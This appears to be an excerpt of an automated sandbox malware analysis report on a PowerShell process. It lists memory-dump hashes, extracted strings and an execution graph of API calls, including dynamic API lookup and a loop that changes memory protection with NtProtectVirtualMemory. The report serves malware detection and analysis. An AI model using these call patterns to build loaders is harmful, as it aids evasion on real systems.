                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d26153bf935072c82c1fd4530f3bc1a399f88f98cd097d17cd608d46fe94db2c
                                                  • Instruction ID: a6d62062cfcd1fa45c44becc421f56062af72c72279facf05d9120147c7e8cef
                                                  • Opcode Fuzzy Hash: d26153bf935072c82c1fd4530f3bc1a399f88f98cd097d17cd608d46fe94db2c
                                                  • Instruction Fuzzy Hash: BA01473A34061ACBCB2095AAA400A7AF79EDFC6626F14C43ED846C7260CA32C805C360
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: edda53e2453d45a3e101bb510e588ea9de91b512140954dac205d7055c014f4c
                                                  • Instruction ID: 63b739d488bc751d620fb5b2765a876bc1dd7176595cebb490decefe25ce94a9
                                                  • Opcode Fuzzy Hash: edda53e2453d45a3e101bb510e588ea9de91b512140954dac205d7055c014f4c
                                                  • Instruction Fuzzy Hash: A1017BF2B841614BD71212BC0953D6E6B029FD0779B1108E9CA009F256CA799E02C3E7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e969d452a66fd38f5c02d4b5333e4b618c1f06f1dc7d90a6477e7da19a88039a
                                                  • Instruction ID: ee6c5dae32ba28076db8688d1f80e0d0d32b21a8b4dec9dcdf5f0b8ade96c4a5
                                                  • Opcode Fuzzy Hash: e969d452a66fd38f5c02d4b5333e4b618c1f06f1dc7d90a6477e7da19a88039a
                                                  • Instruction Fuzzy Hash: 6B11EC34A04209EFDB05DF98D884E9DBBB6FF88324F288555E405AB365C775E982CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969065262.00000000048FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 048FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_48fd000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 95879d0ee2c2648e35c0e773751cb9bdec3fd6f7bf0e698e542aad618c293204
                                                  • Instruction ID: 8d49cd2a46a2252019e7bc69b2218beb4963c83240a7fc06204c6b7c406b66ab
                                                  • Opcode Fuzzy Hash: 95879d0ee2c2648e35c0e773751cb9bdec3fd6f7bf0e698e542aad618c293204
                                                  • Instruction Fuzzy Hash: 3B01207110430499D710AE15DDC4B57FFDCEFC5324F18CA26DF498B146D279A445C6B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969065262.00000000048FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 048FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_48fd000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: abb42aaac0de93d009f0aeeb001da1420742f6491846d6356e3f94e074a1bc7a
                                                  • Instruction ID: 673c806ea8eb5b90c3ca7702ce344f8642278537c408b6670c87dde43aee1091
                                                  • Opcode Fuzzy Hash: abb42aaac0de93d009f0aeeb001da1420742f6491846d6356e3f94e074a1bc7a
                                                  • Instruction Fuzzy Hash: D5014C7100E3C09ED7129B259C94A52BFB4EF53224F19C5DBDE888F2A7C2699849C772
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 117d53842902172f169aab299def2573553970aacdbbde697d7f4818a7181bed
                                                  • Instruction ID: 0b9e859ee890c312e0505b5c621b232b42144905fdfc99e06c70c6c800f59330
                                                  • Opcode Fuzzy Hash: 117d53842902172f169aab299def2573553970aacdbbde697d7f4818a7181bed
                                                  • Instruction Fuzzy Hash: F8B012301051404FC201CB50C850440BB609F82114318C0CA9404CB253CB27DD03C700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,SLl$,SLl$4'jq$4'jq$4'jq$4'jq$d5<k$tPjq$tPjq$xSLl$$jq$$jq$$jq$$jq$Bl$Bl
                                                  • API String ID: 0-120405274
                                                  • Opcode ID: 8f38cc6f577701d810c1815e0809b4f9492554d3b8185c48119803f8e34e810d
                                                  • Instruction ID: 74433ee69a4669e6e11e5098558f6d152230d921d6c61a0336d61a59fc30d818
                                                  • Opcode Fuzzy Hash: 8f38cc6f577701d810c1815e0809b4f9492554d3b8185c48119803f8e34e810d
                                                  • Instruction Fuzzy Hash: 39F16CF17043468FDB158BB88890B6BFFAAEF82319F14846BD445CB295DA31CC45C7A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$W$tPjq$tPjq$$jq$$jq$$jq$$jq$Bl$Bl
                                                  • API String ID: 0-4121416824
                                                  • Opcode ID: bbbc47cd46fe0109ad4481c2a49bedb97d669ac24a46471c7dbb121e8391a8e5
                                                  • Instruction ID: b0e3f6f4aa2d1f3de6006cf543768dcf311f6d6369cb119454d78b493a5909e6
                                                  • Opcode Fuzzy Hash: bbbc47cd46fe0109ad4481c2a49bedb97d669ac24a46471c7dbb121e8391a8e5
                                                  • Instruction Fuzzy Hash: 86A179F13043458FD7109BB99890A76BFBAEFC6228F14846BD809CB391DA31CD41C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$4'jq$4'jq$tL>k$x.=k$-=k
                                                  • API String ID: 0-2786229770
                                                  • Opcode ID: d0f1564bc4227082c3cfccd8e8612d23612a8154520778c8e42723bab23e890a
                                                  • Instruction ID: d7eea9f3639cbe07454e295f45a48e8cde0a5bf3620d30b78844df0618451cb0
                                                  • Opcode Fuzzy Hash: d0f1564bc4227082c3cfccd8e8612d23612a8154520778c8e42723bab23e890a
                                                  • Instruction Fuzzy Hash: 090251B4B00218CFDB64DB24C951FEABBB6EF88304F108499D409AB355CB75AE81CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$84Jl$84Jl$tPjq$tPjq$$jq$(pq$(pq$(pq
                                                  • API String ID: 0-1404106076
                                                  • Opcode ID: e2c84a62f9612760d14bec8365cecefe7bbcedad99f1fdb36986788ce4239a03
                                                  • Instruction ID: 5de24c7ec7463e00063ad892f3dd6ee1ca8771d399e9920422b3f5cf568573ec
                                                  • Opcode Fuzzy Hash: e2c84a62f9612760d14bec8365cecefe7bbcedad99f1fdb36986788ce4239a03
                                                  • Instruction Fuzzy Hash: 0361C5B4B00206DFDB24CF55C540BAAB7FABF49318F198469E805AB395C771DD81CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$84Jl$TQoq$TQoq$tPjq$$jq$$jq$$jq
                                                  • API String ID: 0-3407823554
                                                  • Opcode ID: d4679edc046b7fa5716c05d4a1b90fd0fb27ccfc8afa17a302079155e749c855
                                                  • Instruction ID: a814a13d1338504b7d5414185ec0a1b30447991f3ee932fccdc925a09c57f78b
                                                  • Opcode Fuzzy Hash: d4679edc046b7fa5716c05d4a1b90fd0fb27ccfc8afa17a302079155e749c855
                                                  • Instruction Fuzzy Hash: A151E4B4A0020ADFDF25CE15C544BBA77BABF4131EF1884AAE8059B2D1D771DD44CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$84Jl$TQoq$TQoq$tPjq$$jq$$jq$$jq
                                                  • API String ID: 0-3407823554
                                                  • Opcode ID: 300af664380cff11165189806faf4222e7d7c95c6e62dd0509c6a013fc7b4678
                                                  • Instruction ID: 9efdb53f4016f60fd040011ee4a606c45bc449fc8c83d8a08d31d186c495fe3a
                                                  • Opcode Fuzzy Hash: 300af664380cff11165189806faf4222e7d7c95c6e62dd0509c6a013fc7b4678
                                                  • Instruction Fuzzy Hash: C251E5B4A0020ADFDF24CE05C544BBAB7AABF4131EF5484A6E8069B3D0D7B1DC40CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$84Jl$tPjq$$jq$$jq$$jq
                                                  • API String ID: 0-2788191417
                                                  • Opcode ID: 558ad9bd04765a00db6e54e9ec92182f8f44b562f6df822c78a0a8d91eb50175
                                                  • Instruction ID: 91b4be1e60a83a71d6b5279fc710e99d75ffd4c21dee9897483a927a2858dc6c
                                                  • Opcode Fuzzy Hash: 558ad9bd04765a00db6e54e9ec92182f8f44b562f6df822c78a0a8d91eb50175
                                                  • Instruction Fuzzy Hash: 2261D3B4E0020AEFDF24CF94D645BBA77BBAB45319F548456E8005B2D4C7B1DD80CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                  • API String ID: 0-103809679
                                                  • Opcode ID: 2dfa498c07b6288283dfe4a29b48f13ee813918bbb46c66564afa88489c22440
                                                  • Instruction ID: 3a4e575aafb689e7a14a8a6e46846c55d881e0d84a1309e1477c284f21119712
                                                  • Opcode Fuzzy Hash: 2dfa498c07b6288283dfe4a29b48f13ee813918bbb46c66564afa88489c22440
                                                  • Instruction Fuzzy Hash: 6F4127B1B043058FDB159B3999106BFBFA7DF82214F1444ABD941CB295EB35CA41C7E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 84Jl$XRoq$XRoq$tPjq$$jq
                                                  • API String ID: 0-2809620307
                                                  • Opcode ID: 8d23f2e3daf8aa5c0bf25bdca2be5b39c6146ff0c6d5001298a544f72a833422
                                                  • Instruction ID: 19d42483e7626d25fca988ee21a0530c8ed315a9573c59c5204f68ebe6223519
                                                  • Opcode Fuzzy Hash: 8d23f2e3daf8aa5c0bf25bdca2be5b39c6146ff0c6d5001298a544f72a833422
                                                  • Instruction Fuzzy Hash: 9441BEB5E00206DFDB24CF19C148EAAB7FBAB89318F19C0AAE4046B255C775DD41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$tPjq$$jq$$jq$$jq
                                                  • API String ID: 0-728028659
                                                  • Opcode ID: 389831937d31483f4c8fa8b5305462ffcb78c8331dc7b5468ee5c645615ddc96
                                                  • Instruction ID: 3e3482b6a7ee879f79c06381ea09a4a376251ec97376a0a65767d1c31bb98fb3
                                                  • Opcode Fuzzy Hash: 389831937d31483f4c8fa8b5305462ffcb78c8331dc7b5468ee5c645615ddc96
                                                  • Instruction Fuzzy Hash: 253100B4E00206DFDB24CF05C580BA6B7B6EB85329F18C56AF8869B390C775DD42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ojq$(ojq$(ojq$(ojq
                                                  • API String ID: 0-3475039101
                                                  • Opcode ID: 7203da4ee6f1a1caccfbeaf584ddd1d06d1ed444be5ff2775d4310b8233168ff
                                                  • Instruction ID: ce5024c132eb7a8ff7a03da9db42f1582f132fa2069b8d654f17ef6eea1247fb
                                                  • Opcode Fuzzy Hash: 7203da4ee6f1a1caccfbeaf584ddd1d06d1ed444be5ff2775d4310b8233168ff
                                                  • Instruction Fuzzy Hash: 5DF168B1708306DFDB149F68D860BAABFBAEF81318F14C46AE415CB295DB71C841C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$4'jq$4'jq
                                                  • API String ID: 0-4000621977
                                                  • Opcode ID: 374689cc5dc427eb3135f12a766ddb81ffec2635603651382ce3ca4c2fe025eb
                                                  • Instruction ID: 0eec89071da6b9acd924912f6f3afb4d8b862352fff9352e55ddfe558caac63e
                                                  • Opcode Fuzzy Hash: 374689cc5dc427eb3135f12a766ddb81ffec2635603651382ce3ca4c2fe025eb
                                                  • Instruction Fuzzy Hash: 70D158B57042158FCB148A68D810FBABBAAEFC1368F14C47AE905CF291DA75CC42C7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 84Jl$84Jl$tPjq$tPjq
                                                  • API String ID: 0-3885027026
                                                  • Opcode ID: 528c842adee118d2720169165cdf24851b13f78fa8e39d3a759310e5b47aa00a
                                                  • Instruction ID: a26d04cd8abb252e3a7afed272da9da877a4f48a8d3a38208fbd70897ae067c7
                                                  • Opcode Fuzzy Hash: 528c842adee118d2720169165cdf24851b13f78fa8e39d3a759310e5b47aa00a
                                                  • Instruction Fuzzy Hash: 7A9138B17002569FCB149B69C891B7BBBAAFF85318F28C46AD905CF391DA31DC41C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl
                                                  • API String ID: 0-3879808291
                                                  • Opcode ID: e164d19922e2a77c00abc73c5c18480157e7c9276b33382479eed5ba4d0d4c32
                                                  • Instruction ID: fb36d7f87cebaa8c49bfe0a29b1a178404d444bf2e92377b451e507fe17320db
                                                  • Opcode Fuzzy Hash: e164d19922e2a77c00abc73c5c18480157e7c9276b33382479eed5ba4d0d4c32
                                                  • Instruction Fuzzy Hash: E2718EB8B01205DFDB14CFA8C551EAABBB6EF88318F16C469D801AB314DB31EC51CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,SLl$,SLl$p5<k$xSLl
                                                  • API String ID: 0-2419043112
                                                  • Opcode ID: 77781f9ec518c3c3627b6ffea4c609814a39c704495ad2a84e77e91480fe2500
                                                  • Instruction ID: bdf2ee69203c5316e8b00811321c903a2fcf9bf713290c30a95e30509b370ef7
                                                  • Opcode Fuzzy Hash: 77781f9ec518c3c3627b6ffea4c609814a39c704495ad2a84e77e91480fe2500
                                                  • Instruction Fuzzy Hash: DE4136F1B043059FC720DBA89841FAAFFE6EF86254F14886AE905DB251DA71C841C7A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tPjq$$jq$$jq$$jq
                                                  • API String ID: 0-1483318767
                                                  • Opcode ID: 2cd004d5e17c7c265e03b1e708c3bf6aee2f66d4c4cc3b244d37c71553901631
                                                  • Instruction ID: ec2456148b0f01651997f1ce2ba7ead911374abb17a0d2929bacc04a6837ea02
                                                  • Opcode Fuzzy Hash: 2cd004d5e17c7c265e03b1e708c3bf6aee2f66d4c4cc3b244d37c71553901631
                                                  • Instruction Fuzzy Hash: CC313DF13093428FD7218BA4C880BA6BBB5EF92728F15869BE454DB2A2C675DD40C761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $jq$$jq$$jq$$jq
                                                  • API String ID: 0-2428501249
                                                  • Opcode ID: b0536cba37969faea4e4dacf175a99d84452aeb66bcc2e687781eeedc77f63eb
                                                  • Instruction ID: 4f44509fd4d44b7d84bbb7a29ba1efaad0fad48b3e2585422cf6f6a4a59fbf9b
                                                  • Opcode Fuzzy Hash: b0536cba37969faea4e4dacf175a99d84452aeb66bcc2e687781eeedc77f63eb
                                                  • Instruction Fuzzy Hash: E62157B53152025BEB24996A8840B67B69ADBC172DF20842A9806CB3C1DDF6E801C361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,SLl$4'jq$d5<k$xSLl
                                                  • API String ID: 0-3704323017
                                                  • Opcode ID: b5679c9d0a38f903b16bb44a4cf799c5d0925137d6b80d495ced7f51368b197b
                                                  • Instruction ID: a3ef285e860e1d058f71a5ed3a12459172931020996391b6e500fdaaaff5ae93
                                                  • Opcode Fuzzy Hash: b5679c9d0a38f903b16bb44a4cf799c5d0925137d6b80d495ced7f51368b197b
                                                  • Instruction Fuzzy Hash: 583138F4B00207CBCB248E9885C0E3BB7EAEB8424DF048469D9059B365D771DC41CBA3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $jq$$jq$$jq$$jq
                                                  • API String ID: 0-2428501249
                                                  • Opcode ID: 2e9cff8389947ed67ce467a203d2458114eda262fb964f27dda4079e259fe06c
                                                  • Instruction ID: 3c53629c1a3a96200847613df342a5afe24380d5bd4b4595bd1ae630004edc18
                                                  • Opcode Fuzzy Hash: 2e9cff8389947ed67ce467a203d2458114eda262fb964f27dda4079e259fe06c
                                                  • Instruction Fuzzy Hash: 0B21F5B16053068FDB218E64C9406B6BBBAEF42218F14C4ABE894DB252D775C985C792
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$$jq$$jq
                                                  • API String ID: 0-1496060811
                                                  • Opcode ID: 267d481e16494242a920b8c26193b59215dc1779c3a42bf5bf0cdf0e83732af9
                                                  • Instruction ID: 690910dce1771b0bf8ef33f071013f985298ae1a880d575bc21fbe29bf591b79
                                                  • Opcode Fuzzy Hash: 267d481e16494242a920b8c26193b59215dc1779c3a42bf5bf0cdf0e83732af9
                                                  • Instruction Fuzzy Hash: 96012B6174E3D64FC72B162C58200666F7B9FC365472A44EBC480DF2D7C9588D0AC3A7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:2.2%
                                                  Dynamic/Decrypted Code Coverage:99.8%
                                                  Signature Coverage:1.9%
                                                  Total number of Nodes:1652
                                                  Total number of Limit Nodes:1
                                                  execution_graph 7637 2366c7a7 7638 2366c7be 7637->7638 7645 2366c80d 7637->7645 7638->7645 7646 2366c7e6 GetModuleHandleA 7638->7646 7640 2366c835 GetModuleHandleA 7640->7645 7641 2366c872 7643 2366c85f GetProcAddress 7643->7645 7645->7640 7645->7641 7645->7643 7647 2366c7ef 7646->7647 7653 2366c80d 7646->7653 7655 2366c803 GetProcAddress 7647->7655 7650 2366c835 GetModuleHandleA 7650->7653 7651 2366c872 7653->7650 7653->7651 7654 2366c85f GetProcAddress 7653->7654 7654->7653 7659 2366c80d 7655->7659 7656 2366c835 GetModuleHandleA 7656->7659 7657 2366c872 7658 2366c85f GetProcAddress 7658->7659 7659->7656 7659->7657 7659->7658 7110 2366a1e0 7113 2366a1fe 7110->7113 7112 2366a1f6 7114 2366a203 7113->7114 7115 2366aa53 21 API calls 7114->7115 7116 2366a298 7114->7116 7117 2366a42f 7115->7117 7116->7112 7117->7112 7660 236681a0 7661 236681d9 7660->7661 7662 236681dd 7661->7662 7673 23668205 7661->7673 7663 23666368 _free 20 API calls 7662->7663 7665 236681e2 7663->7665 7664 23668529 7666 23662ada _ValidateLocalCookies 5 API calls 7664->7666 7667 236662ac ___std_exception_copy 26 API calls 7665->7667 7668 23668536 7666->7668 7669 236681ed 7667->7669 7670 23662ada _ValidateLocalCookies 5 API calls 7669->7670 7671 236681f9 7670->7671 7673->7664 7674 236680c0 7673->7674 7677 236680db 7674->7677 7675 23662ada _ValidateLocalCookies 5 API calls 7676 23668152 7675->7676 7676->7673 7677->7675 7678 236621a1 ___scrt_dllmain_exception_filter 5750 503f94b 5753 503f987 5750->5753 5751 503f9b5 NtProtectVirtualMemory 5751->5753 5752 503f9aa Sleep 5752->5750 5753->5750 5753->5751 5753->5752 5980 2366506f 5981 23665081 5980->5981 5982 23665087 5980->5982 5984 23665000 5981->5984 5988 2366500d 5984->5988 5989 2366502a 5984->5989 5985 23665024 5987 2366571e _free 20 API calls 5985->5987 5986 2366571e _free 20 API calls 5986->5988 5987->5989 5988->5985 5988->5986 5989->5982 7679 236660ac 7680 236660b7 7679->7680 7681 236660dd 7679->7681 7680->7681 7682 236660c7 FreeLibrary 7680->7682 7682->7680 5990 2366ac6b 5991 2366ac84 __startOneArgErrorHandling 5990->5991 5993 2366acad __startOneArgErrorHandling 5991->5993 5994 2366b2f0 5991->5994 5995 2366b329 __startOneArgErrorHandling 5994->5995 5997 2366b350 __startOneArgErrorHandling 5995->5997 6005 2366b5c1 5995->6005 5998 2366b393 5997->5998 5999 2366b36e 5997->5999 6018 2366b8b2 5998->6018 6009 2366b8e1 5999->6009 6002 2366b38e __startOneArgErrorHandling 6003 23662ada _ValidateLocalCookies 5 API calls 6002->6003 6004 2366b3b7 6003->6004 6004->5993 6006 2366b5ec __raise_exc 6005->6006 6007 2366b7e5 RaiseException 6006->6007 6008 2366b7fd 6007->6008 6008->5997 6010 2366b8f0 6009->6010 6011 2366b90f __startOneArgErrorHandling 6010->6011 6012 2366b964 __startOneArgErrorHandling 6010->6012 6025 236678a3 6011->6025 6013 2366b8b2 __startOneArgErrorHandling 20 API calls 6012->6013 6017 2366b95d 6013->6017 6016 2366b8b2 __startOneArgErrorHandling 20 API calls 6016->6017 6017->6002 6019 2366b8d4 6018->6019 6020 2366b8bf 6018->6020 6022 23666368 _free 20 API calls 6019->6022 6021 2366b8d9 6020->6021 6023 23666368 _free 20 API calls 6020->6023 6021->6002 6022->6021 6024 2366b8cc 6023->6024 6024->6002 6026 236678cb 6025->6026 6027 23662ada _ValidateLocalCookies 5 API calls 6026->6027 6028 236678e8 6027->6028 6028->6016 6028->6017 6942 2366742b 6943 23667430 6942->6943 6944 23667453 6943->6944 6946 23668bae 6943->6946 6947 23668bdd 6946->6947 6948 23668bbb 6946->6948 6947->6943 6949 23668bd7 6948->6949 6950 23668bc9 RtlDeleteCriticalSection 6948->6950 6951 2366571e _free 20 API calls 6949->6951 6950->6949 6950->6950 6951->6947 7683 23663eb3 7686 23665411 7683->7686 7687 2366541d _abort 7686->7687 7688 23665af6 _abort 38 API calls 7687->7688 7691 23665422 7688->7691 7689 236655a8 _abort 38 API calls 7690 2366544c 7689->7690 7691->7689 6029 23663370 6040 23663330 6029->6040 6041 23663342 6040->6041 6042 2366334f 6040->6042 6043 23662ada _ValidateLocalCookies 5 API calls 6041->6043 6043->6042 6952 23665630 6953 2366563b 6952->6953 6955 23665664 6953->6955 6956 23665660 6953->6956 6958 23665eb7 6953->6958 6965 23665688 6955->6965 6959 23665c45 __dosmaperr 5 API calls 6958->6959 6960 23665ede 6959->6960 6961 23665efc InitializeCriticalSectionAndSpinCount 6960->6961 6962 23665ee7 6960->6962 6961->6962 6963 23662ada _ValidateLocalCookies 5 API calls 6962->6963 6964 23665f13 6963->6964 6964->6953 6966 236656b4 6965->6966 6967 23665695 6965->6967 6966->6956 6968 2366569f RtlDeleteCriticalSection 6967->6968 6968->6966 6968->6968 7118 236663f0 7119 23666400 7118->7119 7127 23666416 